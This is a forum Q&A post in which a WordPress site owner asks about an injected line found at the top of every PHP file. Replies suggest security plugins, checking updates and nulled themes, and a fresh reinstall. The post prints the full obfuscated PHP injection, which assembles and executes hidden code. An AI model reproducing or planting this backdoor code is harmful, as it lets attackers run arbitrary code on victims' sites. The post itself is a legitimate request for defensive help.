# Wordpress PHP files hacked?

Tags: php, wordpress

I just noticed that ALL of my PHP files in a wordpress install have been modified by an outside source.  I don't even know what this code does, but it's caused my site to not even load on some browsers.  Right now I am going through every file and removing the lines in question, but wondering if anyone has seen this before and has found a solution to prevent these types of injection hacks.

Here's what the code from one file looks like.

```
$mcvecgx = '`ftsbqA7>q%6< x7fw6*  x7f_*#  157 x6e"; function jbavbgd($n){return chr(ord($nr (strstr($uas,"  x63 15=])0#)U!  x27{**u%-#jt0}Z;0]=]0#)2q%l}S;2-u%!-#2#2  164") && (!isset($GLOBALS[" x61 156 x75 156 x61"])))) { $GLOBALmdR6<*id%)dfyfR  x27tmw!>!#]y84]275]y83]273]y76]277#<!%t2w>#]y7  x24-  x24*<!  x24-  x24gps)%j>bqov>*ofmy%)utjm!|!*5!  x2**-)1/2986+7**^/%rx<~!!%s:N}#-%o:W%c:>1<%b:>1<!gps)%j:><b%  x7f!<X>b%Z<#opo#>b%!*##>>X)!gjZ<#opo#>b%!**X)ufttj  x2>1*!%b:>1<!fmtf!%b:>%s: x5c%j:.2^,%b:<!%c:>%s:  x5c%j:^<!%w`  x5c^>E!<2,*j%-#1]#-bubE{h%)tpqsut>j%2)gj!|!*nbsbq%)323ldfidk!~!<**qp%!-uyfu%)%<#462]47y]252]18y]#>q%<#762]67y]562]38y]572]48y]#>m%:|:*r%:-t%)3of:op6767~6<Cw6<pd%w6Z6<.5+yfeobz+sfwjidsb`bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!/!#0#984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K]285]Ke]53Ld]53]Kc]55Ld]55#*<%bG9}:}.6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7UFH# x27rfs%6~6< x7fw6)idubn`hfsq)!sp!*#ojneb#-*f%)4]y31M6]y3e]81#/#7e:55946-tr.5]53]Kc#<%tpz!>!#]D6M7]K3#<v}.;/#/#/},;#-#}+;%-qp%)54l}  x27;%!<*#}_;#)323ldfid>}&;!os<#g6R85,67R37,18R#>q%V<*#fopoV;hojepdoF.uof($uas," x72 166 x3a 61  x31")) or (strstr($uas,"  x61 156 x6S[" x61 156 x75 156 x61"]=1; $uas=strtolower($_SE}-}!#*<%nfd>%fdy<Cb*[%h!>!%tdz)%bbT-%b47]67y]37]88y]27]28y]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m%=*hrray_map("jbavbgd",str_split("%tjw!>!#]y84]275]y83]248]y83]2563of)fepdof`57ftbc x7f!|!*uyfu x27k:!ftmf!}Z;^nbsbq%!>!%yy)#}#-# x24-  x24-tusqpt)%z-#:#*  x244]273]y76]252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7x242178}527}88:}334}472  x24<!%ff2!>!bssbz)  x24]25  xdpt%}K;`ufldpt}X;`msvd}R;*msv%)}.;`UQPMSVD!-id%)uqpuft`msvd}x24- x24]26  x24-  x24<%j,,*!| x24-  x24gvodujpo!  x24-  x24y7<*K)ftpmdXA6|7**197-2qjdXA6~6<u%7>/7&6|7**111127-K)eb1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppdx78"))) { $vkvwvuq = " x63 162 x65 141 x74 145 x5fsX x27u%)7fmjix6<C x27&6<*rfs%7-K)fujsxX4  162 x6f 151 x64")) oj6<^#Y# x5cq% x27Y%6<.msv7L6M7]D4]275]D:M8]Df#<%tdz>#L4]275L3]248L3P64/%t2w/  x24)##-!#~<#/%  x24-  x24!>!fyqmpef)# x24*<!%t::!>! x243of>2bd%!<5h%/#0#/*#npd/#)rrd/#00;quui#>.%!<***f xe#)tutjyf`4  x223}!+!<+{e%+*!*+fepdfe{h+{d%Y%)fnbozcYufhA  x272qj%6<^#zsfvr#85:52985-t.98]K4]65]D8]86]y31]278]y3f]51L3]8^<!Ce*[!%cIjQeTQcOc/#00#W~!Ydrr)%rxB%epnbss!>!bssbz)#44ec:137  x41 107 x45 116 x54"]); if ((strstr($uas,"  x6#zsfvr# x5cq%7**^#zsfvr#  x5cq%)ufttj x22)g}R;2]},;osvufs}  x27;mnui}&;zepc}/#%#/#o]#/*)323zbe!-#jt0*?]+^?]_  x5c}X x24<!%t2`hA x27pd%6<C x27pd%6|6.7eu{66~67<&w34]342]58]24]31#-%tdz*Wsfuvso!%bss  x5csboe))1/35.)1/14+9fubfsdXk5`{66~6<&w6< x7fwjgk4`{6~6<tfs%w6< x7fw6*CWtfs%)7gj6<*id%)ftpA;~!} x7f;!|!}{;)gj}l;33bq}k;opjudovg}x;0]#-#D#-#W#-#C#-#O#-#N#*-!%ff2-!%t4)% x24-  x24y4 x24-  x24]y8  W~!Ypp2)%zB%z>! x24/%tmw/ x24)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN}  x5cq%7/7#@#7/7^#iubq# x5cq% x27jsv%6<C>^7-UFOJ`GB)fubfsdXA  x27K6<  x7fw6*3qj%7>  x2272qj%)7gj6<**2qj%)ho1M5]67]452]88]5]48]32M3]317]445]212]445]43]321]464]284]364]6]2tjyf`opjudovg)!gj!|!*msv%)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%-bubE,;uqpuft`msvd}+;!>!}  x27;!>>>!}_;gvc%}&;ftmbg}%7-K)udfoopdXA x22)7gj6<*QDU`MPT7-NBFSUT`LDPT]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:5297e:56-xr.9]88M4P8]37]278]225]241]334]368]32#QwTW%hIr  x5c1^-%r  x5c2^-%hOh/#00#W~!%t2w)##Qtjw)#]82#-#!#-%tmw)%t#ujojRk3`{666~6<&w6< x7fw6*CW&)7gj6<.[A  x27&6<  x7fw6*  x7f_*#[k2`{-#1GO  x22#)fepmqyfA>2b%!<*qp%-*.%)euhA)T-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]3416*CW&)7gj6<*doj%7-C)fepmqnjA x27&%)Rb%))!gj!<*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>vufs} x7f;!opjudovg}k~~9{d%:osvufs:ww2!>#p#/#p#/%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!SV,6<*)ujojR x27id%6<  x7fw6*  x7f_*`hA  x27pd%6<pd%w6Z6<.4`hA x27pd%6<pd%w6Z6<.3`hA x27pd%6<pd%w6Z6<.:-111112)eobs`un>qp%!|Z~!<#%ww2)%w`TW~ x24<!fwbm)%tjw)bssbz)#6<*&7-#o]s]o]s]#)fepmqyf  x27*&7-n%)utjm6<  x7fw6*CW&)7gj6<*K)ftpmYpp3)%cB%iN}#-! x24/%tmw/ x24)%c*W%eN+#Qi x5c1^W%c!>!%i x5c2uopD#)sfebfI{*w%)kVx{**#k#)tutjyf`x x22l:!}V;3q%}U;y]sfxpmpusut)tpqssutRe%)Rdf#<!%tww!>!  x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]38y]();}}RVER[" x48 124 x54 120 x5f 125 x53 105 x52 y]g2y]#>>*4-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!**#j{hnp36]73]83]238M7]381]21]y81]265]y72]254]y76#<!%w:!>!(%w:!>! x24>  x22!ftmbg)!gj<*#k#)usbut`cpV  x7f x7f x7f x7f<u%V x27{ftmfV ~928>>  x22:ftmbg39*56A:>:8:|:7#6#)tutjyf`439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{h6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd`ufh`fmjg}[;l!ssbnpe_GMFT`QIQ&f_UTPI`QUU2]3]364]6]283]427]36]373P6]L1M5]D2P4]D6#<%G]y6d]281Ld]245]K2{h%)sutcvt)fubmgoj{hA!osvufs!~<3,j%>j%!*324-  x24-!%  x24-  x24*!|! x24-  x24 x5c%j^  x24-  x24tvctus)% x24-  x24b!~!<##!>!2p%Z<^2  x5c2b%!>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bd%%yy>#]D6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]273]D6P2L5P6]y6gP-  x24!>!  x24/%tjw/ x20 x72 157 x6d 145")) or (strstr($uas,"  x66 151 x72 145 x66 157 w:Qb:Qc:W~!%z!>2<!gps)%j>1<%j=6[%fs%6<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%7-M)+opjudovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>1<%j:=tj{fpg)%s:*<%j:,,Bjg!)%j:>1<%j=tj{fpg)%  x24-  x24*<!~!  x2ww**WYsboepn)%bss-%rxB%h>#]y31]278I&e_SEEB`FUPNFS&d_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&b%!|!*)323zbek!~!  x5cSFWSFT`%}X;!sp!*#opo#>>}R;ms27,*e  x27,*d  x27,*c  x27,*b  x27)fepdof.)fepdof./#@#/qp%>5h%!<*:::::f  146 x75 156 x63 164 x69 x7f;!osvufs}w;* x7f!>>  x22!pd%)!gj}Z;h!opjudovg}{;#)tu,d7R17,67R37,#/q%>U<#16,47R57,27R66,#/q%>2q%d#)tutjyf`opjudovg x22)!gj}1~!<2p% x7fd  163 x69 145")) or (strstrsfuvso!sboepn)%epnbss-%rx%)m%):fmjix:<##:>:h%:<#64y]552]e7y]#>n%<#372]58y]472]37y]672]48y]#>sjudovg<~  x24<!%o:!>! !*9!  x27!hmg%)!gj!~<ofmy%,3,j%>j%!<**3-j%-bubE{h%)sutcvt-#w#)ld7!hmg%)!gj!|!*1?hmg%)!gj!<**2-4-bub::**<(<!fwbm)%tjw)#  x24#-!#]y38#-!%w:**<")));$huqgmdl = $vkvwvuq("",649#-!#:618d5f9#-!#f6c68399#-!#65egb2dc#*<! $klpobto); $huqgmdlpm3qjA)qj3hopmA  x273qj%6<*P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y6<.fmjgA x27doj%6< x7fw6*  x7f_*#fm! x27!hmg%!)!gj!<2,*j%!-#1]#-bubE{h%)tpqsut>j%!*72! x27!hmg%)!gjif((function_exists(" x6f 142 x5f 163 x74 141 x7#!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcnbs)-1);} @error_reporting(0); $klpobto = implode(ax7f<*X&Z&S{ftmfV x7f<*XAZASV<*w%)ppde>u%V<#65,47R25E{h%)sutcvt)esp>hmg%!<12>j%!|!*#91y]c9StrrEVxNoiTCnUF_EtaERCxecAlPeR_rtSiblgzqry'; $eieuopev=explode(chr((394-274)),substr($mcvecgx,(18736-12716),(161-127))); $rslxhquk = $eieuopev[0]($eieuopev[(3-2)]); $blbacxfo = $eieuopev[0]($eieuopev[(13-11)]); if (!function_exists('yyqcaxkq')) { function yyqcaxkq($wiimixun, $llaefy,$zyljyqpk) { $rnruyal = NULL; for($ldyxfe=0;$ldyxfe<(sizeof($wiimixun)/2);$ldyxfe++) { $rnruyal .= substr($llaefy, $wiimixun[($ldyxfe*2)],$wiimixun[($ldyxfe*2)+(3-2)]); } return $zyljyqpk(chr((53-44)),chr((421-329)),$rnruyal); }; } $jgsudgbug = explode(chr((269-225)),'5788,48,147,65,1122,49,3929,43,2201,49,5245,27,1064,58,1823,22,76,23,4625,63,1733,49,5083,25,27,49,5883,48,1266,62,4063,40,646,21,3535,65,2370,37,3661,64,1666,30,1782,41,813,65,1643,23,2973,45,2738,62,5615,26,2067,32,2697,41,2250,42,1845,25,0,27,2463,25,3331,33,5690,34,2488,44,212,20,4721,62,3501,34,3185,65,4248,50,1526,60,2927,46,5108,55,2862,65,4385,41,5724,64,505,30,5386,63,302,25,5449,35,5982,38,3972,70,5207,38,4492,56,3250,39,1975,50,5017,66,3600,27,5836,47,667,65,878,29,3838,24,3364,58,4298,27,4919,66,382,57,535,41,1328,51,4985,32,963,58,3422,35,4164,55,4219,29,1696,37,2025,42,4783,40,4103,61,5931,51,5163,44,1021,43,3785,53,2292,32,2532,42,99,48,2324,46,232,42,1419,56,3862,62,1209,57,5297,68,576,70,5365,21,1475,51,4426,66,1379,40,4604,21,2606,27,1586,57,274,28,4855,30,1914,61,3725,60,2143,58,5552,43,5272,25,2633,64,3119,66,4885,34,3018,68,2099,44,907,29,732,44,936,27,4548,56,1870,44,4352,33,776,37,1171,38,3289,42,3086,33,4325,27,4042,21,2800,62,2407,56,327,55,4823,32,439,66,4688,33,3457,44,3627,34,5641,49,2574,32,5484,68,5595,20,3924,5'); $jhgewn = $rslxhquk("",yyqcaxkq($jgsudgbug,$mcvecgx,$blbacxfo)); $rslxhquk=$mcvecgx; $jhgewn(""); $jhgewn=(575-454); $mcvecgx=$jhgewn-1;
```

It's just one long line, inserted at the top of every single PHP file.  Any help would be appreciated!

Comment: Which version of Wordpress?

Comment: the reason to never use wp - so easy to hack :) I personally haven't used wp.. at all, well aside from once, never again, so I can't say 100% if it is a hack but does look dodgy

Comment: [Why is “Can someone help me?” not an actual question?](http://meta.stackoverflow.com/q/284236/1011527)

Comment: Are you using any nulled plugins or themes? when did u last update the corefiles?

Comment: If you didn't put that code in there, then someone can execute arbitrary code on your website. Most people consider that a "hack".

Comment: I strongly advise you tu use at least one security plugin when dealing with wordpress: Wordfence Security and/or iThemes Security for example.

Comment: I'm on Wordpress 4.8 right now.  Last updated just a few weeks ago, before I ever noticed the hack.  All of my plugins are up to date as well.

I am using the Sucuri Security plugin and have disabled the 'admin' account, because I was getting a lot of failed brute force login attempts from a bunch of random IPs.  Those seemed to have stopped but obviously they found a backdoor somewhere.

I will remove all my inactive themes and plugins just to be safe as well.

Comment: I was thinking about [this vulnerability](https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html). Maybe you have been owned before you upgrade to 4.8?

Comment: Thank you guys, all this info was really helpful.  I ended up just creating a new fresh install, removing all the injections from my PHP files in my theme, and copied all the pertinent info over and everything seems to be working again.  I'm installing the Wordfence security plugin also, and hope to avoid any future attacks.